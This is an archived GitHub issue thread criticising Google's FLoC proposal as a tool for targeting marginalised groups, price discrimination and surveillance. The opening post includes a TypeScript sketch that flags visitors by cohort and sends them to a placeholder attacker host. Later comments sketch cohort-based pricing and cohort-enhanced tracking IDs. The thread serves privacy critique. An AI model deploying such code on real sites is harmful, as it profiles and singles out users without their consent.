This repository has been archived by the owner on Mar 16, 2023. It is now read-only.

General concerns about FLoC-powered abuse #36

Closed
BasileLeparmentier opened this issue Jan 8, 2021 · 13 comments

Comments

@BasileLeparmentier

We have significant concerns about the long-term viability of FLoC due to the social consequences it might have.
Indeed, in FLoC, the user agent (the Chrome browser) is solely responsible for assigning people "with similar interests (or behaviour)" to a cohort. This is a huge responsibility, and potentially one that could lead to unintended, but very real, societal consequences.

Let me describe what I think is a likely bad usage of FLoC:

Let us consider an "attacker" who wants to harm a specific group (for instance, because of race, religion, sexual orientation, political views, etc.). Some members of this group will likely share a FLoC, as it is FLoC's purpose to group users with similar interests based on their browsing history. The attacker can easily emulate the internet browsing history of a member of the group they wish to harm and see which FLoC that profile is assigned to. The "attacker" can then target this FLoC ID in any way they wish, even though they don't have access to any specific user. If they wanted access to a specific user, the attacker would "just" need to obtain it via a website with PII browsed by anyone with the same FLoC ID.
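To make the mechanics concrete, here is a minimal sketch of the attack described above, assuming the `document.interestCohort()` API from the FLoC explainer; the specific cohort IDs and the reporting endpoint are invented for illustration.

```typescript
// Sketch only: assumes the document.interestCohort() API from the FLoC
// explainer / origin trial. The cohort IDs and reporting endpoint below
// are hypothetical placeholders.

// Step 1 (offline): emulate the browsing history of members of the targeted
// group in a fresh Chrome profile and record the cohort IDs the browser
// assigns. Suppose that yields this set:
const targetedCohorts = new Set(["12345", "67890"]); // hypothetical IDs

// Step 2 (online): on any page the attacker controls, read each visitor's
// cohort and flag those who fall into one of the pre-computed cohorts.
async function flagVisitor(): Promise<void> {
  if (!("interestCohort" in document)) return; // FLoC not available
  try {
    const { id } = await (document as any).interestCohort();
    if (targetedCohorts.has(id)) {
      // This visitor shares a cohort with the emulated group members and
      // can now be singled out, without any cross-site cookie.
      await fetch("https://attacker.example/report", {
        method: "POST",
        body: JSON.stringify({ cohort: id }),
      });
    }
  } catch {
    // interestCohort() rejects when no cohort is available.
  }
}

void flagVisitor();
```

Note that step 1 requires nothing more than a scripted browser replaying a plausible browsing history; no access to any real member of the group is needed.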

This might look far-fetched, but similar "artisanal" attacks have already happened, for instance here: https://www.pinknews.co.uk/2015/02/18/gay-dating-apps-used-by-attackers-to-trap-victims-in-ireland/

So this already exists today, in some form. But the thing is, Chrome will have done all the heavy lifting to make such attacks work "at scale". Being part of the group, instead of shielding the user from potential harm, actually puts a target on their back.

This makes this kind of attack significantly easier than with third-party cookies (where you would need to drop a cookie directly on the group's website), and you benefit from Chrome's added intelligence to do so, as Chrome groups users together and gives the FLoC IDs out to everyone.

Yes, the aforementioned threat could be reduced, but not eliminated. For example, as you proposed, excluding websites flagged as related in some way to marginalized communities could work on paper. But it is going to be extremely hard to set up in practice on an ever-changing web. As you stated in #27, it is possible to have bias even from a seemingly unbiased signal. Web browsing history represents the user's interests and is therefore by nature biased toward people's interests (and this includes groups suffering prejudice, or susceptible of being targeted by malevolent actors). The web is extremely wide and diverse, and some remote corner of it will inevitably fall through the cracks, especially in countries and cultures unfamiliar to Chrome engineers, where endangered groups might differ wildly from those in the Western Hemisphere in general, and the United States in particular.

Another point of contention with removing such groups is that it is discriminatory for businesses with legitimate interests, and for the people targeted by these businesses. For example, a FLoC of straight newlyweds would allow personalization and monetization for businesses targeting them, but the same kind of business specialized for LGBTQ+ people (if those cohorts were filtered out for the sake of sensitivity) would not have any means to do targeted advertising, and therefore to grow fairly compared to non-LGBTQ+ businesses!

I really believe that if FLoC happens, then seeing examples such as those I listed above is not a matter of "what if" but "when". As such, it could seriously jeopardize the long-term prospects of FLoC as an accepted marketing framework.

Could you please let us know what safeguards would be put in place to shield FLoC from such risks and ensure its viability in the long term?

@Chaz6

Chaz6 commented Jan 26, 2021

I have been an internet user for over 20 years and I strongly reject FLoC in its entirety.

@inoas

inoas commented Mar 3, 2021

Today, public-service news in Germany cited TechCrunch, without questioning anything, claiming that FLoC will be the solution to the ad-industry-vs-privacy issue.

Starting next year, Google wants to offer its advertising customers profiles of user groups. That means it divides its users into categories: one group that is interested in fitness products, for example; another that likes to vacation in the Caribbean. Conversely, this means individual users could no longer be specifically addressed with tailored advertising - only groups of like-minded people.

https://www.tagesschau.de/wirtschaft/unternehmen/google-stoppt-personalisierte-werbung-101.html

But in reality this will create biased groups, discriminate against the poor, create filter bubbles of ads, and allow targeting of those who are deemed worthy of specific discounts. Price discrimination is a strong tool to increase profits and make customers pay more than they need to. This already happens if you browse websites on Apple products, for instance. FLoC seems to do the same, just on steroids.
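As a hypothetical illustration of that price-discrimination point (the cohort-to-markup table is entirely invented, and the assumed API is again `document.interestCohort()`):

```typescript
// Hypothetical sketch: vary the displayed price by FLoC cohort, much like
// sites already vary it by device or user agent.
const markupByCohort: Record<string, number> = {
  "11111": 1.15, // cohort assumed to correlate with high-income interests
  "22222": 0.95, // cohort the shop wants to win over with discounts
};

async function displayedPrice(basePrice: number): Promise<number> {
  try {
    const { id } = await (document as any).interestCohort();
    return basePrice * (markupByCohort[id] ?? 1.0);
  } catch {
    return basePrice; // no cohort available: fall back to the list price
  }
}
```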

@DarrienG

DarrienG commented Mar 5, 2021

I agree, FLOC is honestly one of the worst ideas to semi-recently come out. The idea that it is somehow better for privacy is just insane.

It would be better for privacy if interest-based advertising could be accomplished without needing to collect a particular individual’s browsing history.

It is simply another way to collect data from users. It doesn't stop anyone from doing anything they were doing before, it just provides another incredibly powerful avenue for collecting data.

If it were to become implemented, it would become a terribly dangerous precedent for the web. Advertisers already have too much power, there is no need to provide them with any more power.

@Sora2455

Sora2455 commented Mar 6, 2021

The problem for me is that as long as there exist browsers that don't implement FLOC (and I can't see it ever becoming universal), ad companies will need to retain their current tracking techniques to maintain the information gathering they rely on. And as long as they're doing that, FLOC will be added to their tracking, not replace it, thus reducing privacy rather than adding to it.
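To illustrate the "added to, not replacing" point, a hypothetical sketch of a tracker that simply appends the cohort to whatever identifier it already uses, gaining extra identifying bits without giving anything up:

```typescript
// Hypothetical sketch: the tracker keeps its existing identifier and merely
// concatenates the FLoC cohort as additional identifying information.
async function trackingId(): Promise<string> {
  // Stand-in for whatever cookie or fingerprint ID the tracker already uses.
  const existingId = localStorage.getItem("tid") ?? crypto.randomUUID();
  localStorage.setItem("tid", existingId);

  let cohort = "none";
  try {
    cohort = (await (document as any).interestCohort()).id; // extra bits
  } catch {
    // Browsers without FLoC: the tracker loses nothing, it just gains nothing.
  }

  return `${existingId}:${cohort}`; // strictly more information than before
}
```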

@dmarti
Contributor

dmarti commented Mar 8, 2021

@Sora2455 I have no doubt that at least some countries will mandate a FLoC-enabled browser. It's not useful for surveilling individuals by itself, but an evil dictator on a budget could use FLoC to

  • prioritize assignment of surveillance personnel to individuals
  • allocate public services preferentially to favored religious and language groups
  • encourage self-reeducation by members of marginal groups

FLoC is a complement to other surveillance technologies. FLoC cohorts do not eliminate the need for costly, manual surveillance of a subset of citizens, just as a vehicle license plate does not eliminate the need for random checks of a driver’s papers. However, license plates and cohorts are easily observable in large numbers, and appropriate penalties for falsification of either can be applied.

@Sora2455

Sora2455 commented Mar 8, 2021

@dmarti I... fail to see how "It's great for evil dictators on a budget!" is supposed to make me feel better about this technology.

@dmarti
Contributor

dmarti commented Mar 11, 2021

W3C TAG review: w3ctag/design-reviews#601

@michaelkleber
Collaborator

Please see https://docs.google.com/viewer?a=v&pid=sites&srcid=Y2hyb21pdW0ub3JnfGRldnxneDo1Mzg4MjYzOWI2MzU2NDgw

@DarrienG

DarrienG commented Apr 1, 2021

Sensitivity of data is not my concern; giving my general browsing interests, derived from my browsing history, to any implementer is the problem. Whether that tells sites I am looking up pasta dishes or rifle models, it is more than they should know. Google deciding what is and isn't sensitive doesn't fill me with hope either.

At best companies should know these things in their own domains and nowhere else. FLoC's expansion of power for advertising companies (and anyone else who uses the data) across the web is the problem. The shared doc does not address any of these concerns. This issue should not be closed.

@michaelkleber
Collaborator

@DarrienG Perhaps you're supporting the position discussed in #76? I think what you are expressing is different from what @BasileLeparmentier was talking about when he created this issue.

@DarrienG

DarrienG commented Apr 1, 2021

I'll move my complaints over there then. Cheers

@inoas

inoas commented Apr 3, 2021

@dmarti I... fail to see how "It's great for evil dictators on a budget!" is supposed to make me feel better about this technology.

I don't think the comment was meant to make anyone feel better.

The potential for abusing this - say in Hong Kong - is mind-blowingly bad.

@inoas

inoas commented Apr 3, 2021

Please see https://docs.google.com/viewer?a=v&pid=sites&srcid=Y2hyb21pdW0ub3JnfGRldnxneDo1Mzg4MjYzOWI2MzU2NDgw

@michaelkleber Where are the sociologists and other humanities graduates on your team?

So you are creating a new tracking technology, with a team of 2 mathematicians and 2 software engineers, that has the potential to change the world (maybe for the better, but certainly also for the worse).

Sounds sane to only have math and tech guys on the team - right?

7 participants